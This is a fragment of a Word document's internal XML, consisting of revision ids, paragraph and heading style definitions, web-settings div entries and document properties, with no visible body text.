    <w:rsid w:val="00902A44"/>
    <w:rsid w:val="00905813"/>
    <w:rsid w:val="00910F78"/>
    <w:rsid w:val="0091276E"/>
    <w:rsid w:val="009240BE"/>
    <w:rsid w:val="00924C6C"/>
    <w:rsid w:val="00925B1B"/>
    <w:rsid w:val="0094331F"/>
    <w:rsid w:val="0094373D"/>
    <w:rsid w:val="009446E9"/>
    <w:rsid w:val="00944C7A"/>
    <w:rsid w:val="009519C5"/>
    <w:rsid w:val="00966E6C"/>
    <w:rsid w:val="009721CE"/>
    <w:rsid w:val="009746B5"/>
    <w:rsid w:val="009816E9"/>
    <w:rsid w:val="00984340"/>
    <w:rsid w:val="00986C60"/>
    <w:rsid w:val="009924F1"/>
    <w:rsid w:val="009A393D"/>
    <w:rsid w:val="009A743D"/>
    <w:rsid w:val="009C31E4"/>
    <w:rsid w:val="009C5694"/>
    <w:rsid w:val="009D1619"/>
    <w:rsid w:val="009F62D3"/>
    <w:rsid w:val="00A02435"/>
    <w:rsid w:val="00A15A20"/>
    <w:rsid w:val="00A50B8C"/>
    <w:rsid w:val="00A516AF"/>
    <w:rsid w:val="00A525C2"/>
    <w:rsid w:val="00A53764"/>
    <w:rsid w:val="00A53C0D"/>
    <w:rsid w:val="00A61341"/>
    <w:rsid w:val="00A63358"/>
    <w:rsid w:val="00A66277"/>
    <w:rsid w:val="00A70EDE"/>
    <w:rsid w:val="00A7564D"/>
    <w:rsid w:val="00A8336F"/>
    <w:rsid w:val="00AA1E8C"/>
    <w:rsid w:val="00AA3D72"/>
    <w:rsid w:val="00AB0905"/>
    <w:rsid w:val="00AB2041"/>
    <w:rsid w:val="00AB5052"/>
    <w:rsid w:val="00AB5EC6"/>
    <w:rsid w:val="00AC74EB"/>
    <w:rsid w:val="00AD24A8"/>
    <w:rsid w:val="00AD6B02"/>
    <w:rsid w:val="00AE1FBA"/>
    <w:rsid w:val="00AE62FE"/>
    <w:rsid w:val="00AF3298"/>
    <w:rsid w:val="00B116D9"/>
    <w:rsid w:val="00B13E40"/>
    <w:rsid w:val="00B21BBA"/>
    <w:rsid w:val="00B21E38"/>
    <w:rsid w:val="00B221EA"/>
    <w:rsid w:val="00B23AF9"/>
    <w:rsid w:val="00B24E68"/>
    <w:rsid w:val="00B34AA3"/>
    <w:rsid w:val="00B42CA7"/>
    <w:rsid w:val="00B520D9"/>
    <w:rsid w:val="00B63230"/>
    <w:rsid w:val="00B73C43"/>
    <w:rsid w:val="00BA0404"/>
    <w:rsid w:val="00BA2EC9"/>
    <w:rsid w:val="00BA6870"/>
    <w:rsid w:val="00BA6D4A"/>
    <w:rsid w:val="00BB055B"/>
    <w:rsid w:val="00BC5F00"/>
    <w:rsid w:val="00BD565A"/>
    <w:rsid w:val="00BE708E"/>
    <w:rsid w:val="00BE7258"/>
    <w:rsid w:val="00BF2DFC"/>
    <w:rsid w:val="00BF7E01"/>
    <w:rsid w:val="00C06C3F"/>
    <w:rsid w:val="00C115D4"/>
    <w:rsid w:val="00C2403A"/>
    <w:rsid w:val="00C37A19"/>
    <w:rsid w:val="00C44305"/>
    <w:rsid w:val="00C56DEB"/>
    <w:rsid w:val="00C62274"/>
    <w:rsid w:val="00C66018"/>
    <w:rsid w:val="00C705C7"/>
    <w:rsid w:val="00C7168B"/>
    <w:rsid w:val="00C94BF7"/>
    <w:rsid w:val="00CA44D3"/>
    <w:rsid w:val="00CB38D4"/>
    <w:rsid w:val="00CC3C53"/>
    <w:rsid w:val="00CC53EF"/>
    <w:rsid w:val="00CD6498"/>
    <w:rsid w:val="00CE0CA6"/>
    <w:rsid w:val="00CE1A69"/>
    <w:rsid w:val="00CE421A"/>
    <w:rsid w:val="00CE512F"/>
    <w:rsid w:val="00D03653"/>
    <w:rsid w:val="00D1074A"/>
    <w:rsid w:val="00D129F3"/>
    <w:rsid w:val="00D335FD"/>
    <w:rsid w:val="00D36F5A"/>
    <w:rsid w:val="00D37B6C"/>
    <w:rsid w:val="00D401E5"/>
    <w:rsid w:val="00D44F78"/>
    <w:rsid w:val="00D458DA"/>
    <w:rsid w:val="00D47003"/>
    <w:rsid w:val="00D56C54"/>
    <w:rsid w:val="00D66F67"/>
    <w:rsid w:val="00D72176"/>
    <w:rsid w:val="00D75F2D"/>
    <w:rsid w:val="00D807AA"/>
    <w:rsid w:val="00D84D7B"/>
    <w:rsid w:val="00D90A55"/>
    <w:rsid w:val="00D92608"/>
    <w:rsid w:val="00D93964"/>
    <w:rsid w:val="00DB3366"/>
    <w:rsid w:val="00DB4275"/>
    <w:rsid w:val="00DB6996"/>
    <w:rsid w:val="00DC40DD"/>
    <w:rsid w:val="00DF164F"/>
    <w:rsid w:val="00E214F5"/>
    <w:rsid w:val="00E22D0F"/>
    <w:rsid w:val="00E33276"/>
    <w:rsid w:val="00E40A63"/>
    <w:rsid w:val="00E41DEC"/>
    <w:rsid w:val="00E51817"/>
    <w:rsid w:val="00E54F10"/>
    <w:rsid w:val="00E8324E"/>
    <w:rsid w:val="00E83A10"/>
    <w:rsid w:val="00E84F2E"/>
    <w:rsid w:val="00E93AA2"/>
    <w:rsid w:val="00EC6DAA"/>
    <w:rsid w:val="00EE064F"/>
    <w:rsid w:val="00EE06A4"/>
    <w:rsid w:val="00EF55D9"/>
    <w:rsid w:val="00F02519"/>
    <w:rsid w:val="00F318FB"/>
    <w:rsid w:val="00F357C5"/>
    <w:rsid w:val="00F47469"/>
    <w:rsid w:val="00F47E69"/>
    <w:rsid w:val="00F561A7"/>
    <w:rsid w:val="00F61412"/>
    <w:rsid w:val="00F618D7"/>
    <w:rsid w:val="00F71285"/>
    <w:rsid w:val="00F81117"/>
    <w:rsid w:val="00F82B75"/>
    <w:rsid w:val="00F858A8"/>
    <w:rsid w:val="00F87831"/>
    <w:rsid w:val="00FA146D"/>
    <w:rsid w:val="00FA1D76"/>
    <w:rsid w:val="00FB7918"/>
    <w:rsid w:val="00FB7AA9"/>
    <w:rsid w:val="00FC2791"/>
    <w:rsid w:val="00FC37D5"/>
    <w:rsid w:val="00FC44B4"/>
    <w:rsid w:val="00FE0990"/>
    <w:rsid w:val="00FE1CB7"/>
    <w:rsid w:val="00FE61BA"/>
    <w:rsid w:val="17C46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B2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D55"/>
    <w:pPr>
      <w:spacing w:line="288" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00752D55"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>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49205A"/>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9205A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Pharagraph"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00411F48"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="12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style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="261"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="522"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="783"/>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sid w:val="00752D55"/>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49205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sid w:val="0049205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qFormat/>
    <w:rsid w:val="00411F48"/>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6"/>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Char">
    <w:name w:val="Char"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="PMingLiU" w:hAnsi="Tahoma" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="Char1"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="PMingLiU" w:hAnsi="Tahoma" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Pharagraph">
    <w:name w:val="Pharagraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="0049205A"/>
    <w:pPr>
      <w:ind w:left="432"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="PMingLiU" w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SoDo">
    <w:name w:val="SoDo"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="SoDoChar"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1014"/>
        <w:tab w:val="left" w:pos="3986"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SoDoChar">
    <w:name w:val="SoDo Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="SoDo"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00E22D0F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ng-star-inserted">
    <w:name w:val="ng-star-inserted"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009924F1"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-star-inserted1">
    <w:name w:val="ng-star-inserted1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009924F1"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA44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3088">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="530074945">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="692456889">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="826095566">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1018775922">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="170292966">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1718816468">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2026588556">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="256407002">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="750732821">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="874536972">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="937173415">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1060208348">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1073046819">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1106344147">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="288442117">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1243831714">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1257520330">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1946880659">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1994527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08359-9684-4C81-A75D-4D889252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6-03T08:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-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345638d85f0c52fd5fe7aed2e8c458ee0c221f6f05fe645544eee675494af0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.19805</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>B328B93D88924112B243B9BA9E2DF9AD_12</vt:lpwstr>
  </property>
</Properties>
</file>